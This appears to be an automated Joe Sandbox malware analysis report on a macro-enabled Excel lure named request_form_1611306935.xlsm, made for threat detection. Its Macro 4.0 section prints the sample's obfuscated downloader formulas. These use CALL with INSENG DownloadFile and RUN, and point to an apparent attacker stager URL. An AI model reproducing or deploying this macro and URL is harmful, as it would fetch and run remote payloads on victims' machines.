Analysis Report request_form_1611306935.xlsm
Overview
General Information
Detection
Score: | 56 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Startup |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
No yara matches |
---|
Sigma Overview |
---|
No Sigma rule has matched |
---|
Signature Overview |
---|
Click to jump to signature section
Compliance: |
---|
Uses new MSVCR Dlls | Show sources |
Source: | File opened: | Jump to behavior |
Software Vulnerabilities: |
---|
Document exploit detected (UrlDownloadToFile) | Show sources |
Source: | Section loaded: | Jump to behavior |
Source: | File created: | Jump to behavior |
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) | Show sources |
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: |
Found Excel 4.0 Macro with suspicious formulas | Show sources |
Source: | Initial sample: |
Source: | Binary string: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Window detected: |
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: | ||
Source: | Initial sample: |
Source: | Key opened: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting11 | Path Interception | Path Interception | Masquerading1 | OS Credential Dumping | File and Directory Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Ingress Tool Transfer1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | System Information Discovery1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Junk Data | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Scripting11 | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Behavior Graph |
---|
Screenshots |
---|
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
6% | Virustotal | Browse | ||
9% | ReversingLabs | Document-Excel.Trojan.Heuristic |
Dropped Files |
---|
No Antivirus matches |
---|
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
No Antivirus matches |
---|
URLs |
---|
No Antivirus matches |
---|
Domains and IPs |
---|
General Information |
---|
Joe Sandbox Version: | 31.0.0 Red Diamond |
Analysis ID: | 343133 |
Start date: | 22.01.2021 |
Start time: | 11:40:35 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 4m 27s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | request_form_1611306935.xlsm |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 5 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal56.expl.evad.winXLSM@1/9@0/0 |
Cookbook Comments: |
|
Warnings: | Show All
|
Simulations |
---|
Behavior and APIs |
---|
No simulations |
---|
Joe Sandbox View / Context |
---|
Created / dropped Files |
---|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1028 |
Entropy (8bit): | 7.761039651897249 |
Encrypted: | false |
SSDEEP: | 24:OZYvitHj0T5rwDxmsYnNk56uCnIw2+ujc:O6vitHQT5rvn1ud+uA |
MD5: | 600F503BC1066BEB5FB5DD494AA1CD74 |
SHA1: | A504D5E687B98F9E0FD2896DFC8492DE0F974BE6 |
SHA-256: | B06BA2FAAAF371AE2F92D9047FFDAAF1933E03CFBC1E999E8B7CF378E33499C3 |
SHA-512: | B7D40CDCD4F442E8941947AF64343D8A06CA8C9710E74BE8E00245C5A67DF574ED243D2B988814843C0AD9483D7058EC355CE087665FFDA5C484CBDF8FD40E40 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 677 |
Entropy (8bit): | 7.433026174405032 |
Encrypted: | false |
SSDEEP: | 12:6v/7RllfMXWaBlhV/Jk6gGPRRKyiaWH/LpR5PTQ6//blm1X+fZ8w5s7nP9Np971x:OZYZnDqkZiaOtnEuA1X+a0sL1L9cLUa6 |
MD5: | 55E8A29B221E51BE421B7D4F5F5F7E52 |
SHA1: | 117E73181FC9CDAA0904C6372D68EE48CEDC14E4 |
SHA-256: | B54D8571DB2F8FC570144F24EF7A42CE93FAB269AF166BF1234DBD2F96D86EB8 |
SHA-512: | 8592A133D815BBC225336F9149A4C89244CBCDEACC958470126DCD266DA8590C587D50D56A7F70771568C4D015BF55642DAAD6434F1C47E8BBBC4AB691694654 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 17094 |
Entropy (8bit): | 7.243558253598769 |
Encrypted: | false |
SSDEEP: | 384:SE054FLBBP+BzJTit5vyuiMEWrGWnMbC32XRR34nB4:STeLBBP+O5DiM5MbC32bInm |
MD5: | C9542164110AF8CFC53ABD9EF7D1FAF2 |
SHA1: | D677B504674CBF88EE56AF1F6B9FCEE45955768B |
SHA-256: | E6663370EC760F464F45D1519946E2E9E8B30D803BD370A0108C31CDB09DE5F9 |
SHA-512: | 948FAD155DD234FAF956A42FCDDAA9EBC8A269AC23A0BAB5EB309285B39DBF654370245F8A2FF4D7DD66E0E716ABD9DD240CDE4C75F0F8541B952F510FEFC520 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 867 |
Entropy (8bit): | 4.47700073466311 |
Encrypted: | false |
SSDEEP: | 12:85QYCLgXg/XAlCPCHaX2B8GB/GM0X+WnicvblubDtZ3YilMMEpxRljKlcTdJP9TK:85/U/XTm6GIDYeYDv3qEwrNru/ |
MD5: | 646E92259F25991D5918FD64547DE5BE |
SHA1: | FA9752F7698C259938948300B85FFC32A201AB61 |
SHA-256: | 1D954D9E191D7CFB6097DFDAE8B0342CB1D316187B08A8AFF25FF3CB94F40FC0 |
SHA-512: | 9708FCE46F1EE46933FD5043A3BAB7294068E208FA8F1A5F31826B1FDF5387FA382F406531661361568FAB3EA8A9D8F8F54E728C535B7E394AB82DB5637BC5AC |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 124 |
Entropy (8bit): | 4.730125367343892 |
Encrypted: | false |
SSDEEP: | 3:oyBVomxWcAOWJcWdPHWJcWdmxWcAOWJcWdv:djYOWJcWlHWJcWbOWJcWt |
MD5: | 9F2450545CBECE631C009CA27293A1CC |
SHA1: | 4E966E5262561E9A2C88AC96D7AA9E5F8FCE5958 |
SHA-256: | C272CB58A82E5B756E14FB5341A525DC3DD8493959F510DE996C2C7172F4A8FE |
SHA-512: | FB9A5C33FD6E03384357BEC8DF3711A27A76B2230A3ECE7BE847B6E3460A233241627AC853883A2AFCBF626B4C72BA9830410F760967052F2C222AD09FA20306 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2168 |
Entropy (8bit): | 4.530224630987585 |
Encrypted: | false |
SSDEEP: | 48:8k/XTFGFr9m6Vtc6bEwQh2k/XTFGFr9m6Vtc6bEwQ/:8k/XJGFr9jpbXQh2k/XJGFr9jpbXQ/ |
MD5: | 945DEFC498A20CE3B0830BF9B17464BF |
SHA1: | 3D721D3D07D8D181D13CAA05A6CC7B4EC8F32F05 |
SHA-256: | 4611AAB6008EC34530B2D47EDF5CF916CC5C0A03D7307AFFFFBEF8DDA66F0C6C |
SHA-512: | 94D8F8248948F20F0C3B62BE803E74DC85E0FA4D161EEF55AEA2B3F3B9F10C6BF503565C9BCAC305284ABF9783900F8068904613F4874C8D6970174750CB0A5A |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | modified |
Size (bytes): | 17083 |
Entropy (8bit): | 7.246060583670574 |
Encrypted: | false |
SSDEEP: | 384:SE054tBP+BzJTLNuiMEWrGWnMbC32XRR3Sq:STsBP+4iM5MbC32bH |
MD5: | 4CBA89E3F0B78E6CD572AF4BD2840C01 |
SHA1: | E88E329EABEC40E106636EAFE6E82A19516C9E68 |
SHA-256: | C0311D754290840213BDA3FCB100669AC604595D933A4854674A22190745E383 |
SHA-512: | 9B6920EF13117137365F5627746BBCFAD949B26EC54D28DE2598CFF6F4E4D9927CA8FD591C6295544EF0CEB851EA956F628050DA6203234D3089BDF50C519A5E |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 17094 |
Entropy (8bit): | 7.243558253598769 |
Encrypted: | false |
SSDEEP: | 384:SE054FLBBP+BzJTit5vyuiMEWrGWnMbC32XRR34nB4:STeLBBP+O5DiM5MbC32bInm |
MD5: | C9542164110AF8CFC53ABD9EF7D1FAF2 |
SHA1: | D677B504674CBF88EE56AF1F6B9FCEE45955768B |
SHA-256: | E6663370EC760F464F45D1519946E2E9E8B30D803BD370A0108C31CDB09DE5F9 |
SHA-512: | 948FAD155DD234FAF956A42FCDDAA9EBC8A269AC23A0BAB5EB309285B39DBF654370245F8A2FF4D7DD66E0E716ABD9DD240CDE4C75F0F8541B952F510FEFC520 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 330 |
Entropy (8bit): | 1.4377382811115937 |
Encrypted: | false |
SSDEEP: | 3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS |
MD5: | 96114D75E30EBD26B572C1FC83D1D02E |
SHA1: | A44EEBDA5EB09862AC46346227F06F8CFAF19407 |
SHA-256: | 0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523 |
SHA-512: | 52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0 |
Malicious: | true |
Reputation: | moderate, very likely benign file |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.245499147058293 |
TrID: |
|
File name: | request_form_1611306935.xlsm |
File size: | 17127 |
MD5: | 5fd958006a94c6145364c06bbf264d06 |
SHA1: | d5cc7dc1083508dbe5531db67a3f78866e00330c |
SHA256: | f41c4588d2ef8936d9417069a1c5a44833fb2994c60c54bda14b1aac9aa7b83a |
SHA512: | a8c80661725284a629ec45f25331ea1349f63f4ea8245ae6c6fb62b9e3ac6114889c6b909c34332acd403ac7f0448a1692165b888aa8f7c4fa0ef8fbb404c0d9 |
SSDEEP: | 384:rNUK4o2aGcnzJTABwiMEx4o9QC32XRRl4Y:JUpaGcPiML8QC32blP |
File Content Preview: | PK..........!.................[Content_Types].xml ...(...............!!........................................................................................................................................................................................ |
File Icon |
---|
Icon Hash: | e4e2aa8aa4bcbcac |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OpenXML | |
Number of OLE Files: | 1 |
OLE File "request_form_1611306935.xlsm" |
---|
Indicators | |
---|---|
Has Summary Info: | |
Application Name: | |
Encrypted Document: | |
Contains Word Document Stream: | |
Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: |
Macro 4.0 Code |
---|
,,,,,,,,,,,,,,,,=HALT(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL('Doc2'!AA15&'Doc2'!AA16,'Doc2'!AB15&'Doc2'!AB16&'Doc2'!AB17,""JCJ"",'Doc2'!AD15,0)",,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL('Doc2'!AA19&'Doc2'!AA20,'Doc2'!AB19&'Doc2'!AB20&'Doc2'!AB21,""JCJ"",'Doc2'!AD15&'Doc2'!AD19,0)",,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL('Doc2'!AA23&'Doc2'!AA24,'Doc2'!AB23&'Doc2'!AB24&'Doc2'!AB25,""JJCCJJ"",0,A60,'Doc2'!AD15&'Doc2'!AD19&'Doc2'!AD23,0,0)",,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL(""INSENG"",""DownloadFile"",""BCCJ"",A60,'Doc2'!AD15&'Doc2'!AD19&'Doc2'!AD23,1)",,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL('Doc2'!AA27&'Doc2'!AA28,'Doc2'!AB27&'Doc2'!AB28&'Doc2'!AB29,""JJCCCCJJ"",0,'Doc2'!AD27,'Doc2'!AD15&'Doc2'!AD19&'Doc2'!AD23,,0,0)",,,,,,,,,,,,,,,,,,,,,,,,,,=RUN(Q1),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,http://jvdattorney.com/stager/babmboa.php,,,,,,,,,,,,,,,,,,,,,,,,,,
Network Behavior |
---|
No network behavior found |
---|
Code Manipulations |
---|
Statistics |
---|
CPU Usage |
---|
Click to jump to process
Memory Usage |
---|
Click to jump to process
High Level Behavior Distribution |
---|
back
Click to dive into process behavior distribution
System Behavior |
---|
General |
---|
Start time: | 11:41:45 |
Start date: | 22/01/2021 |
Path: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13f2f0000 |
File size: | 27641504 bytes |
MD5 hash: | 5FB0A0F93382ECD19F5F499A5CAA59F0 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Disassembly |
---|